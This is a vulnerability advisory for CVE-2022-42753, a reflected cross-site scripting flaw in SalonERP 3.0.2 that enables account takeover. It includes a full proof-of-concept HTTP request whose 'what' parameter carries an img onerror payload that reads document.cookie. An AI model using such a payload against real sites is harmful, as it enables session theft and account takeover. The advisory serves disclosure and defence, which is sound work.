Headline

CVE-2022-42753: SalonERP 3.0.2 - XSS to Account Takeover | Advisories | Fluid Attacks

SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.

2 years ago

CVE

Open in Source

#xss #vulnerability #linux #php #auth #firefox

Home
Advisories
SalonERP 3.0.2 XSS to Account Takeover

Summary

Name

SalonERP 3.0.2 - XSS to Account Takeover

Code name

Hardway

Product

SalonERP

Affected versions

Version 3.0.2

State

Public

Release date

2022-10-27

Vulnerability

Kind

Reflected cross-site scripting (XSS)

Rule

008. Reflected cross-site scripting (XSS)

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSSv3 Base Score

8.8

Exploit available

Yes

CVE ID(s)

CVE-2022-42753

Description

SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.

Vulnerability

The XSS present in SalonERP 3.0.2, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an victim in order to hack their account:

POST /try/backend.php HTTP/2
Host: salonerp.sourceforge.io
Cookie: salonerp-id=EnznqgZ8cAX2N7stbSLl; PHPSESSID=2f8c90c0e918726eed019427af65f438
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Origin: https://hacker.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

what=settings<img+src=1+onerror="(alert)(document.cookie)" />

Exploitation

In this attack we will obtain the victim user account, through a malicious link.

Our security policy

We have reserved the CVE-2022-42753 to refer to these issues from now on.